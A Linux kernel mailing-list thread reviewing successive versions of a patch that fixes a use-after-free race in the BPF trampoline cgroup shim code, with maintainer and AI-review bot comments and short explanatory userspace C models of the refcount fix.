> struct bpf_shim_tramp_link *shim_link =
> container_of(link, struct bpf_shim_tramp_link, link.link);
> + struct bpf_trampoline *tr = shim_link->trampoline;
>
> + if (!tr) {
> + kfree(shim_link);
> + return;
> + }
> +
> + mutex_lock(&tr->mutex);

The link_release is done before the link_dealloc. Why it needs to hold
(/wait) for the tr->mutex again?

> kfree(shim_link);
> + mutex_unlock(&tr->mutex);
> + bpf_trampoline_put(tr);
> }
>
> static const struct bpf_link_ops bpf_shim_tramp_link_lops = {
> @@ -800,10 +808,8 @@ int bpf_trampoline_link_cgroup_shim(struct bpf_prog *prog,
> mutex_lock(&tr->mutex);
>
> shim_link = cgroup_shim_find(tr, bpf_func);
> - if (shim_link) {
> + if (shim_link && atomic64_inc_not_zero(&shim_link->link.link.refcnt)) {

Use bpf_link_inc_not_zero().

pw-bot: cr

xulang

Feb 24, 2026, 4:43:00 AM
to marti...@linux.dev, a...@kernel.org, b...@vger.kernel.org, dan...@iogearbox.net, ddd...@hust.edu.cn, dz...@hust.edu.cn, hust-os-ker...@googlegroups.com, kai...@hust.edu.cn, s...@fomichev.me, xul...@uniontech.com
> I am not sure about this one (details below).
>
>> 2. Guard the freeing of `shim_link` with `tr->mutex` to prevent release
>> while the mutex is held.
>
> The link_release is done before the link_dealloc. Why it needs to hold
> (/wait) for the tr->mutex again?

Yes, I realized that later. There is no need to guard the freeing of `shim_link`.
I mistakenly thought that `shim_link` might get freed by dealloc while
bpf_trampoline_link_cgroup_shim was holding the mutex.
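
The ordering argument (release runs before dealloc, so dealloc needs no lock) can be pictured with a small userspace model. This is a sketch only: the `toy_*` names are hypothetical, and the model assumes nothing beyond what the thread states, namely that release unlinks the object from the shared list and dealloc runs afterwards.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdlib.h>
#include <string.h>

struct toy_link;

struct toy_link_ops {
    void (*release)(struct toy_link *link);
    void (*dealloc)(struct toy_link *link);
};

struct toy_link {
    const struct toy_link_ops *ops;
    bool on_list; /* reachable through the shared lookup list */
};

static char toy_trace[32]; /* records the callback order */

static void toy_release(struct toy_link *link)
{
    /* In the kernel, this is the step that takes tr->mutex while unlinking. */
    link->on_list = false;
    strcat(toy_trace, "release;");
}

static void toy_dealloc(struct toy_link *link)
{
    /* By now no lookup can reach the object, so no lock is needed to free it. */
    assert(!link->on_list);
    strcat(toy_trace, "dealloc;");
    free(link);
}

static const struct toy_link_ops toy_ops = {
    .release = toy_release,
    .dealloc = toy_dealloc,
};

/* Teardown always calls release first, then dealloc. */
static void toy_link_free(struct toy_link *link)
{
    if (link->ops->release)
        link->ops->release(link);
    link->ops->dealloc(link);
}

/* Builds one link, tears it down, and returns the recorded order. */
static const char *toy_teardown(void)
{
    struct toy_link *link = malloc(sizeof(*link));

    if (!link)
        return "";
    link->ops = &toy_ops;
    link->on_list = true;
    toy_trace[0] = '\0';
    toy_link_free(link);
    return toy_trace;
}
```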

xulang

Feb 25, 2026, 1:56:05 AM
to marti...@linux.dev, a...@kernel.org, b...@vger.kernel.org, dan...@iogearbox.net, ddd...@hust.edu.cn, dz...@hust.edu.cn, hust-os-ker...@googlegroups.com, kai...@hust.edu.cn, s...@fomichev.me, xul...@uniontech.com
Based on Martin KaFai Lau's suggestions, I have created a simple patch.

The root cause of this bug is that when `bpf_link_put` reduces the
refcount of `shim_link->link.link` to zero, the resource is considered
released but may still be referenced via `tr->progs_hlist` in
`cgroup_shim_find`. The actual cleanup of `tr->progs_hlist` in
`bpf_shim_tramp_link_release` is deferred. During this window, another
process can cause a use-after-free via `bpf_trampoline_link_cgroup_shim`.

To fix this:
Add an atomic non-zero check in `bpf_trampoline_link_cgroup_shim`.
Only increment the refcount if it is not already zero.
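
For readers unfamiliar with the primitive, "increment only if not already zero" can be sketched in userspace with C11 atomics. This is an illustration, not the kernel implementation: `refcnt_inc_not_zero` and `pick_shim` are hypothetical names, and the compare-exchange loop is one common way to build the operation.

```c
#include <assert.h>
#include <stdatomic.h>
#include <stdbool.h>
#include <stddef.h>

/* Userspace analogue of an "increment unless zero" refcount operation. */
static bool refcnt_inc_not_zero(atomic_long *refcnt)
{
    long old = atomic_load(refcnt);

    while (old != 0) {
        /* On failure, `old` is refreshed with the current value and we retry. */
        if (atomic_compare_exchange_weak(refcnt, &old, old + 1))
            return true;
    }
    return false; /* already released: the caller must not reuse the object */
}

enum shim_action { SHIM_REUSED, SHIM_ALLOCATE_NEW };

/*
 * Hypothetical lookup decision: reuse a shim that is still alive,
 * otherwise fall through to allocating and installing a new one.
 */
static enum shim_action pick_shim(atomic_long *existing_refcnt)
{
    if (existing_refcnt && refcnt_inc_not_zero(existing_refcnt))
        return SHIM_REUSED;
    return SHIM_ALLOCATE_NEW;
}
```

The point of the design is that a count that has reached zero is never raised again, so a shim whose deferred release is pending is treated the same as a shim that was not found.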

Optimized testing:
I used a non-rigorous method to verify the fix by adding a delay in
`bpf_shim_tramp_link_release` to make the bug easier to trigger:

static void bpf_shim_tramp_link_release(struct bpf_link *link)
{
...
if (!shim_link->trampoline)
return;

+ msleep(100);
WARN_ON_ONCE(bpf_trampoline_unlink_prog(&shim_link->link,
shim_link->trampoline, NULL));
bpf_trampoline_put(shim_link->trampoline);
}

Before the patch, running a PoC easily reproduced the crash (almost 100%)
with a call trace similar to KaiyanM's report.
After the patch, the bug no longer occurs even after millions of
iterations.

Signed-off-by: xulang <xul...@uniontech.com>
---
kernel/bpf/trampoline.c | 14 ++++++++------
1 file changed, 8 insertions(+), 6 deletions(-)

diff --git a/kernel/bpf/trampoline.c b/kernel/bpf/trampoline.c
index 976d89011b15..ac99725403ad 100644
--- a/kernel/bpf/trampoline.c
+++ b/kernel/bpf/trampoline.c
@@ -779,6 +779,7 @@ int bpf_trampoline_link_cgroup_shim(struct bpf_prog *prog,
struct bpf_shim_tramp_link *shim_link = NULL;
struct bpf_attach_target_info tgt_info = {};
struct bpf_trampoline *tr;
+ struct bpf_link *link;
bpf_func_t bpf_func;
u64 key;
int err;
@@ -801,12 +802,13 @@ int bpf_trampoline_link_cgroup_shim(struct bpf_prog *prog,

shim_link = cgroup_shim_find(tr, bpf_func);
if (shim_link) {
- /* Reusing existing shim attached by the other program. */
- bpf_link_inc(&shim_link->link.link);
-
- mutex_unlock(&tr->mutex);
- bpf_trampoline_put(tr); /* bpf_trampoline_get above */
- return 0;
+ link = &shim_link->link.link;
+ if (link == bpf_link_inc_not_zero(link)) {
+ /* Reusing existing shim attached by the other program. */
+ mutex_unlock(&tr->mutex);
+ bpf_trampoline_put(tr); /* bpf_trampoline_get above */
+ return 0;
+ }
}

/* Allocate and install new shim. */
--
2.51.0

bot+b...@kernel.org

Feb 25, 2026, 2:38:14 AM
to xul...@uniontech.com, marti...@linux.dev, a...@kernel.org, b...@vger.kernel.org, dan...@iogearbox.net, ddd...@hust.edu.cn, dz...@hust.edu.cn, hust-os-ker...@googlegroups.com, kai...@hust.edu.cn, s...@fomichev.me, xul...@uniontech.com, and...@kernel.org, marti...@kernel.org, edd...@gmail.com, yongho...@linux.dev, c...@meta.com, ihor.s...@linux.dev
> diff --git a/kernel/bpf/trampoline.c b/kernel/bpf/trampoline.c
> --- a/kernel/bpf/trampoline.c
> +++ b/kernel/bpf/trampoline.c

[ ... ]

> @@ -1003,12 +1004,13 @@ struct bpf_attach_target_info tgt_info = {};
>
> shim_link = cgroup_shim_find(tr, bpf_func);
> if (shim_link) {
> + link = &shim_link->link.link;
> + if (link == bpf_link_inc_not_zero(link)) {

The other callers of bpf_link_inc_not_zero() in the tree check the
return value with IS_ERR(), for example in
bpf_link_get_curr_or_next():

link = bpf_link_inc_not_zero(link);
if (IS_ERR(link)) {
(*id)++;
goto again;
}

Would it be more consistent to use IS_ERR() here as well? Something
like:

if (!IS_ERR(bpf_link_inc_not_zero(link))) {
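
Both spellings of the check should accept and reject the same cases, assuming `bpf_link_inc_not_zero()` returns either the link itself or an error pointer. The userspace sketch below imitates that convention; `model_err_ptr`, `model_is_err`, `err_model_link` and `model_inc_not_zero` are hypothetical names, and the 4095 bound mirrors the kernel's `MAX_ERRNO` as an assumption.

```c
#include <assert.h>
#include <errno.h>
#include <stdatomic.h>
#include <stdbool.h>
#include <stdint.h>

#define MODEL_MAX_ERRNO 4095

/* Userspace imitations of the kernel's ERR_PTR()/IS_ERR() helpers. */
static void *model_err_ptr(long err)
{
    return (void *)(intptr_t)err;
}

static bool model_is_err(const void *p)
{
    /* Error pointers occupy the top MODEL_MAX_ERRNO addresses. */
    return (uintptr_t)p >= (uintptr_t)(-MODEL_MAX_ERRNO);
}

struct err_model_link {
    atomic_long refcnt;
};

/* Returns the link on success, or an encoded -ENOENT if the count was zero. */
static struct err_model_link *model_inc_not_zero(struct err_model_link *l)
{
    long old = atomic_load(&l->refcnt);

    while (old != 0) {
        if (atomic_compare_exchange_weak(&l->refcnt, &old, old + 1))
            return l;
    }
    return model_err_ptr(-ENOENT);
}
```

Under this model, `link == model_inc_not_zero(link)` and `!model_is_err(model_inc_not_zero(link))` are true in exactly the same situations, so the choice between them is about matching the idiom of other callers.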

> + /* Reusing existing shim attached by the other program. */
> + mutex_unlock(&tr->mutex);
> + bpf_trampoline_put(tr); /* bpf_trampoline_get above */
> + return 0;
> + }
> }

This commit fixes a use-after-free introduced by commit 69fd337a975c
("bpf: per-cgroup lsm flavor"), which added the bpf_link_inc() call
that could resurrect a zero-refcount link.

Should this include a Fixes: tag?

Suggested:
Fixes: 69fd337a975c ("bpf: per-cgroup lsm flavor")
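
To make "resurrect a zero-refcount link" concrete, here is a minimal userspace sketch using C11 atomics. The `model_ref_*` names are hypothetical and are not kernel APIs; the kernel uses its own atomic helpers rather than `<stdatomic.h>`. The sketch only contrasts an unconditional increment with an increment that refuses to move the count away from zero.

```c
#include <assert.h>
#include <stdatomic.h>
#include <stdbool.h>

/* Hypothetical stand-in for the refcount embedded in a link. */
struct model_ref {
	atomic_long refcnt;
};

/* Unconditional increment: turns 0 back into 1 without complaint. */
static void model_ref_inc(struct model_ref *r)
{
	atomic_fetch_add(&r->refcnt, 1);
}

/* Increment only while the count is non-zero; false means the object is dying. */
static bool model_ref_inc_not_zero(struct model_ref *r)
{
	long old = atomic_load(&r->refcnt);

	while (old != 0) {
		/* On failure, old is refreshed with the current value and we retry. */
		if (atomic_compare_exchange_weak(&r->refcnt, &old, old + 1))
			return true;
	}
	return false;
}

/* Drop one reference; true means the caller released the last one. */
static bool model_ref_put(struct model_ref *r)
{
	return atomic_fetch_sub(&r->refcnt, 1) == 1;
}
```

Once `model_ref_put()` has reported the last reference gone, `model_ref_inc_not_zero()` fails and leaves the count at zero, whereas `model_ref_inc()` would bring the count back to one on an object whose teardown is already scheduled.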


---
AI reviewed your patch. Please fix the bug or email reply why it's not a bug.
See: https://github.com/kernel-patches/vmtest/blob/master/ci/claude/README.md

CI run summary: https://github.com/kernel-patches/bpf/actions/runs/22386382516

AI-authorship-score: medium
AI-authorship-explanation: Commit message uses markdown-style backtick formatting and verbose explanatory style atypical of kernel patches, but the v1-to-v2 iteration addressing specific reviewer feedback and manual reproduction testing suggest human authorship.
issues-found: 2
issue-severity-score: low
issue-severity-explanation: Missing Fixes tag for a use-after-free bug fix and non-idiomatic bpf_link_inc_not_zero() return value comparison; the fix itself is technically correct.

Martin KaFai Lau

Feb 27, 2026, 3:33:48 PM
to xul...@uniontech.com, bot+b...@kernel.org, a...@kernel.org, b...@vger.kernel.org, dan...@iogearbox.net, ddd...@hust.edu.cn, dz...@hust.edu.cn, hust-os-ker...@googlegroups.com, kai...@hust.edu.cn, s...@fomichev.me, and...@kernel.org, marti...@kernel.org, edd...@gmail.com, yongho...@linux.dev, c...@meta.com, ihor.s...@linux.dev
>
>> + /* Reusing existing shim attached by the other program. */
>> + mutex_unlock(&tr->mutex);
>> + bpf_trampoline_put(tr); /* bpf_trampoline_get above */
>> + return 0;
>> + }
>> }
>
> This commit fixes a use-after-free introduced by commit 69fd337a975c
> ("bpf: per-cgroup lsm flavor"), which added the bpf_link_inc() call
> that could resurrect a zero-refcount link.
>
> Should this include a Fixes: tag?
>
> Suggested:
> Fixes: 69fd337a975c ("bpf: per-cgroup lsm flavor")

On top of the Fixes tag, please add bpf to the subject, e.g. "[PATCH bpf
v3] bpf: Fix race condition...". Please also use the
FirstName[[:space:]]LastName <email> format in the "Signed-off-by". For
example: Lang Xu <xul...@uniontech.com>. I understand that there are
different name formats, but the reviewers can't possibly know all of
them, so it is useful to write the name in a way that most people on the
list can understand.

xulang

Feb 27, 2026, 9:26:05 PM
to marti...@linux.dev, and...@kernel.org, a...@kernel.org, bot+b...@kernel.org, b...@vger.kernel.org, c...@meta.com, dan...@iogearbox.net, ddd...@hust.edu.cn, dz...@hust.edu.cn, edd...@gmail.com, hust-os-ker...@googlegroups.com, ihor.s...@linux.dev, kai...@hust.edu.cn, marti...@kernel.org, s...@fomichev.me, xul...@uniontech.com, yongho...@linux.dev
From: Lang Xu <xul...@uniontech.com>
Signed-off-by: Lang Xu <xul...@uniontech.com>
---
kernel/bpf/trampoline.c | 14 ++++++++------
1 file changed, 8 insertions(+), 6 deletions(-)

diff --git a/kernel/bpf/trampoline.c b/kernel/bpf/trampoline.c
index 976d89011b15..ac99725403ad 100644
--- a/kernel/bpf/trampoline.c
+++ b/kernel/bpf/trampoline.c
@@ -779,6 +779,7 @@ int bpf_trampoline_link_cgroup_shim(struct bpf_prog *prog,
 	struct bpf_shim_tramp_link *shim_link = NULL;
 	struct bpf_attach_target_info tgt_info = {};
 	struct bpf_trampoline *tr;
+	struct bpf_link *link;
 	bpf_func_t bpf_func;
 	u64 key;
 	int err;
@@ -801,12 +802,13 @@ int bpf_trampoline_link_cgroup_shim(struct bpf_prog *prog,

 	shim_link = cgroup_shim_find(tr, bpf_func);
 	if (shim_link) {
-		/* Reusing existing shim attached by the other program. */
-		bpf_link_inc(&shim_link->link.link);
-
-		mutex_unlock(&tr->mutex);
-		bpf_trampoline_put(tr); /* bpf_trampoline_get above */
-		return 0;
+		link = &shim_link->link.link;
+		if (link == bpf_link_inc_not_zero(link)) {
+			/* Reusing existing shim attached by the other program. */
+			mutex_unlock(&tr->mutex);
+			bpf_trampoline_put(tr); /* bpf_trampoline_get above */
+			return 0;
+		}
 	}

bot+b...@kernel.org

Feb 27, 2026, 10:04:21 PM
to xul...@uniontech.com, marti...@linux.dev, and...@kernel.org, a...@kernel.org, bot+b...@kernel.org, b...@vger.kernel.org, c...@meta.com, dan...@iogearbox.net, ddd...@hust.edu.cn, dz...@hust.edu.cn, edd...@gmail.com, hust-os-ker...@googlegroups.com, ihor.s...@linux.dev, kai...@hust.edu.cn, marti...@kernel.org, s...@fomichev.me, xul...@uniontech.com, yongho...@linux.dev
> diff --git a/kernel/bpf/trampoline.c b/kernel/bpf/trampoline.c
> --- a/kernel/bpf/trampoline.c
> +++ b/kernel/bpf/trampoline.c

[ ... ]

> @@ -1003,12 +1004,13 @@ struct bpf_attach_target_info tgt_info = {};
>
> shim_link = cgroup_shim_find(tr, bpf_func);
> if (shim_link) {
> - /* Reusing existing shim attached by the other program. */
> - bpf_link_inc(&shim_link->link.link);
> -
> - mutex_unlock(&tr->mutex);
> - bpf_trampoline_put(tr); /* bpf_trampoline_get above */
> - return 0;
> + link = &shim_link->link.link;
> + if (link == bpf_link_inc_not_zero(link)) {

The other callers of bpf_link_inc_not_zero() check the return value
using IS_ERR(), for example bpf_link_by_id():

link = bpf_link_inc_not_zero(link);

and bpf_link_get_curr_or_next():

link = bpf_link_inc_not_zero(link);
if (IS_ERR(link)) {

Should this use the same IS_ERR() pattern for consistency? Something
like:

if (!IS_ERR(bpf_link_inc_not_zero(link))) {

> + /* Reusing existing shim attached by the other program. */
> + mutex_unlock(&tr->mutex);
> + bpf_trampoline_put(tr); /* bpf_trampoline_get above */
> + return 0;
> + }
> }

This commit fixes a use-after-free introduced by commit 69fd337a975c
("bpf: per-cgroup lsm flavor"), which added the bpf_link_inc() call
that could resurrect a zero-refcount link. It appears to be missing
a Fixes: tag. Martin KaFai Lau's review of v2 also expected this tag
to be present.

Suggested:

Fixes: 69fd337a975c ("bpf: per-cgroup lsm flavor")

https://lore.kernel.org/bpf/cd99eba7-ac03-4b53...@linux.dev/


---
AI reviewed your patch. Please fix the bug or email reply why it's not a bug.
See: https://github.com/kernel-patches/vmtest/blob/master/ci/claude/README.md

CI run summary: https://github.com/kernel-patches/bpf/actions/runs/22511586078

AI-authorship-score: low
AI-authorship-explanation: Human authorship patterns: references maintainer suggestion, informal testing description, iterative v1/v2/v3 development with reviewer feedback, addresses a bug reported by a different researcher.
issues-found: 2
issue-severity-score: low
issue-severity-explanation: Missing Fixes: tag (requested by BPF maintainer) and non-standard bpf_link_inc_not_zero() return value comparison pattern; neither causes runtime problems.

Martin KaFai Lau

Mar 2, 2026, 9:39:43 PM
to xul...@uniontech.com, bot+b...@kernel.org, and...@kernel.org, a...@kernel.org, b...@vger.kernel.org, c...@meta.com, dan...@iogearbox.net, ddd...@hust.edu.cn, dz...@hust.edu.cn, edd...@gmail.com, hust-os-ker...@googlegroups.com, ihor.s...@linux.dev, kai...@hust.edu.cn, marti...@kernel.org, s...@fomichev.me, yongho...@linux.dev
Same feedback as the ai-review. I don't have a strong opinion. However,
the newly added "struct bpf_link *link" variable is not needed either. I
would carry the AI's suggestion further and remove the new local
variable as well. Just test:

if (!IS_ERR(bpf_link_inc_not_zero(&shim_link->link.link))) {

>
>> + /* Reusing existing shim attached by the other program. */
>> + mutex_unlock(&tr->mutex);
>> + bpf_trampoline_put(tr); /* bpf_trampoline_get above */
>> + return 0;
>> + }
>> }
>
> This commit fixes a use-after-free introduced by commit 69fd337a975c
> ("bpf: per-cgroup lsm flavor"), which added the bpf_link_inc() call
> that could resurrect a zero-refcount link. It appears to be missing
> a Fixes: tag. Martin KaFai Lau's review of v2 also expected this tag
> to be present.

Indeed, please make sure to address the earlier review feedback.

pw-bot: cr

xulang

Mar 3, 2026, 3:36:59 AM
to marti...@linux.dev, and...@kernel.org, a...@kernel.org, bot+b...@kernel.org, b...@vger.kernel.org, c...@meta.com, dan...@iogearbox.net, ddd...@hust.edu.cn, dz...@hust.edu.cn, edd...@gmail.com, hust-os-ker...@googlegroups.com, ihor.s...@linux.dev, kai...@hust.edu.cn, marti...@kernel.org, s...@fomichev.me, xul...@uniontech.com, yongho...@linux.dev
From: Lang Xu <xul...@uniontech.com>
Fixes: 69fd337a975c ("bpf: per-cgroup lsm flavor")
Signed-off-by: Lang Xu <xul...@uniontech.com>
---
kernel/bpf/trampoline.c | 4 +---
1 file changed, 1 insertion(+), 3 deletions(-)

diff --git a/kernel/bpf/trampoline.c b/kernel/bpf/trampoline.c
index dbe7754b4f4e..894cd6f205f5 100644
--- a/kernel/bpf/trampoline.c
+++ b/kernel/bpf/trampoline.c
@@ -749,10 +749,8 @@ int bpf_trampoline_link_cgroup_shim(struct bpf_prog *prog,
 	mutex_lock(&tr->mutex);

 	shim_link = cgroup_shim_find(tr, bpf_func);
-	if (shim_link) {
+	if (shim_link && !IS_ERR(bpf_link_inc_not_zero(&shim_link->link.link))) {
 		/* Reusing existing shim attached by the other program. */
-		bpf_link_inc(&shim_link->link.link);
-
 		mutex_unlock(&tr->mutex);
 		bpf_trampoline_put(tr); /* bpf_trampoline_get above */
 		return 0;
--
2.51.0

bot+b...@kernel.org

Mar 3, 2026, 4:28:40 AM
to xul...@uniontech.com, marti...@linux.dev, and...@kernel.org, a...@kernel.org, bot+b...@kernel.org, b...@vger.kernel.org, c...@meta.com, dan...@iogearbox.net, ddd...@hust.edu.cn, dz...@hust.edu.cn, edd...@gmail.com, hust-os-ker...@googlegroups.com, ihor.s...@linux.dev, kai...@hust.edu.cn, marti...@kernel.org, s...@fomichev.me, xul...@uniontech.com, yongho...@linux.dev
> bpf: fix: Race condition in bpf_trampoline_unlink_cgroup_shim

The subject references bpf_trampoline_unlink_cgroup_shim, but the
change is in bpf_trampoline_link_cgroup_shim. The commit body
correctly identifies the fix location:

> To fix this:
> Add an atomic non-zero check in `bpf_trampoline_link_cgroup_shim`.

Should the subject say bpf_trampoline_link_cgroup_shim instead?

---
AI reviewed your patch. Please fix the bug or email reply why it's not a bug.
See: https://github.com/kernel-patches/vmtest/blob/master/ci/claude/README.md

CI run summary: https://github.com/kernel-patches/bpf/actions/runs/22615516146

xulang

Mar 3, 2026, 4:52:57 AM
to bot+b...@kernel.org, and...@kernel.org, a...@kernel.org, b...@vger.kernel.org, c...@meta.com, dan...@iogearbox.net, ddd...@hust.edu.cn, dz...@hust.edu.cn, edd...@gmail.com, hust-os-ker...@googlegroups.com, ihor.s...@linux.dev, kai...@hust.edu.cn, marti...@kernel.org, marti...@linux.dev, s...@fomichev.me, xul...@uniontech.com, yongho...@linux.dev
From: Lang Xu <xul...@uniontech.com>

The root cause of this bug is that when `bpf_link_put` reduces the
refcount of `shim_link->link.link` to zero, the resource is considered
released but may still be referenced via `tr->progs_hlist` in
`cgroup_shim_find`. The actual cleanup of `tr->progs_hlist` in
`bpf_shim_tramp_link_release` is deferred. During this window, another
process can cause a use-after-free via `bpf_trampoline_link_cgroup_shim`.

Based on Martin KaFai Lau's suggestions, I have created a simple patch.

To fix this:
Add an atomic non-zero check in `bpf_trampoline_link_cgroup_shim`.
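
The control flow this describes can be sketched in userspace as follows. This is only an illustrative model under stated assumptions: every `model_*` name is hypothetical, the list stands in for `tr->progs_hlist`, the integer `hook` stands in for `bpf_func`, the refcount is a plain `long`, and the `tr->mutex` locking of the real function is omitted. It shows the lookup finding a shim whose count has already dropped to zero, refusing to reuse it, and falling through to install a new one.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdlib.h>

/* Hypothetical miniature shim; refcnt == 0 means its release is pending. */
struct model_shim {
	long refcnt;
	int hook;                  /* stands in for bpf_func */
	struct model_shim *next;
};

struct model_tramp {
	struct model_shim *shims;  /* stands in for tr->progs_hlist */
};

/* A dying shim stays on the list until its deferred cleanup runs. */
static struct model_shim *model_shim_find(struct model_tramp *tr, int hook)
{
	for (struct model_shim *s = tr->shims; s; s = s->next)
		if (s->hook == hook)
			return s;
	return NULL;
}

/* Take a reference only if the shim is still alive. */
static bool model_shim_tryget(struct model_shim *s)
{
	if (s->refcnt == 0)
		return false;
	s->refcnt++;
	return true;
}

/* Returns the shim the caller now holds a reference on, or NULL if allocation fails. */
static struct model_shim *model_link_shim(struct model_tramp *tr, int hook)
{
	struct model_shim *s = model_shim_find(tr, hook);

	if (s && model_shim_tryget(s))
		return s;  /* reuse a live shim */

	/* No shim found, or the one found is already dying: install a new one. */
	s = calloc(1, sizeof(*s));
	if (!s)
		return NULL;
	s->refcnt = 1;
	s->hook = hook;
	s->next = tr->shims;
	tr->shims = s;
	return s;
}
```

With an unconditional increment in place of `model_shim_tryget()`, the second caller would walk away holding a shim that the pending release is about to free, which is the window the commit message describes.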

patchwork-b...@kernel.org

Mar 3, 2026, 6:30:07 PM
to xulang, marti...@linux.dev, and...@kernel.org, a...@kernel.org, bot+b...@kernel.org, b...@vger.kernel.org, c...@meta.com, dan...@iogearbox.net, ddd...@hust.edu.cn, dz...@hust.edu.cn, edd...@gmail.com, hust-os-ker...@googlegroups.com, ihor.s...@linux.dev, kai...@hust.edu.cn, marti...@kernel.org, s...@fomichev.me, yongho...@linux.dev
Hello:

This patch was applied to bpf/bpf.git (master)
by Martin KaFai Lau <marti...@kernel.org>:

On Tue, 3 Mar 2026 16:36:26 +0800 you wrote:
> From: Lang Xu <xul...@uniontech.com>
>
> The root cause of this bug is that when `bpf_link_put` reduces the
> refcount of `shim_link->link.link` to zero, the resource is considered
> released but may still be referenced via `tr->progs_hlist` in
> `cgroup_shim_find`. The actual cleanup of `tr->progs_hlist` in
> `bpf_shim_tramp_link_release` is deferred. During this window, another
> process can cause a use-after-free via `bpf_trampoline_link_cgroup_shim`.
>
> [...]

Here is the summary with links:
- [bpf,v4] bpf: fix: Race condition in bpf_trampoline_unlink_cgroup_shim
https://git.kernel.org/bpf/bpf/c/56145d237385

You are awesome, thank you!
--
Deet-doot-dot, I am a bot.
https://korg.docs.kernel.org/patchwork/pwbot.html


patchwork-b...@kernel.org

Mar 3, 2026, 6:30:13 PM
to xulang, bot+b...@kernel.org, and...@kernel.org, a...@kernel.org, b...@vger.kernel.org, c...@meta.com, dan...@iogearbox.net, ddd...@hust.edu.cn, dz...@hust.edu.cn, edd...@gmail.com, hust-os-ker...@googlegroups.com, ihor.s...@linux.dev, kai...@hust.edu.cn, marti...@kernel.org, marti...@linux.dev, s...@fomichev.me, yongho...@linux.dev
Hello:

This patch was applied to bpf/bpf.git (master)
by Martin KaFai Lau <marti...@kernel.org>:

On Tue, 3 Mar 2026 17:52:17 +0800 you wrote:
> From: Lang Xu <xul...@uniontech.com>
>
> The root cause of this bug is that when `bpf_link_put` reduces the
> refcount of `shim_link->link.link` to zero, the resource is considered
> released but may still be referenced via `tr->progs_hlist` in
> `cgroup_shim_find`. The actual cleanup of `tr->progs_hlist` in
> `bpf_shim_tramp_link_release` is deferred. During this window, another
> process can cause a use-after-free via `bpf_trampoline_link_cgroup_shim`.
>
> [...]

Here is the summary with links:
- [bpf,v5] bpf: fix: Race condition in bpf_trampoline_link_cgroup_shim

Martin KaFai Lau

Mar 3, 2026, 6:47:03 PM
to patchwork-b...@kernel.org, xulang, and...@kernel.org, a...@kernel.org, bot+b...@kernel.org, b...@vger.kernel.org, c...@meta.com, dan...@iogearbox.net, ddd...@hust.edu.cn, dz...@hust.edu.cn, edd...@gmail.com, hust-os-ker...@googlegroups.com, ihor.s...@linux.dev, kai...@hust.edu.cn, marti...@kernel.org, s...@fomichev.me, yongho...@linux.dev


On 3/3/26 3:30 PM, patchwork-b...@kernel.org wrote:
> Hello:
>
> This patch was applied to bpf/bpf.git (master)
> by Martin KaFai Lau <marti...@kernel.org>:
>
> On Tue, 3 Mar 2026 16:36:26 +0800 you wrote:
>> From: Lang Xu <xul...@uniontech.com>
>>
>> The root cause of this bug is that when `bpf_link_put` reduces the
>> refcount of `shim_link->link.link` to zero, the resource is considered
>> released but may still be referenced via `tr->progs_hlist` in
>> `cgroup_shim_find`. The actual cleanup of `tr->progs_hlist` in
>> `bpf_shim_tramp_link_release` is deferred. During this window, another
>> process can cause a use-after-free via `bpf_trampoline_link_cgroup_shim`.
>>
>> [...]
>
> Here is the summary with links:
> - [bpf,v4] bpf: fix: Race condition in bpf_trampoline_unlink_cgroup_shim
> https://git.kernel.org/bpf/bpf/c/56145d237385

The bot is confused. It replied to both v4 and v5. Only v5 has landed.
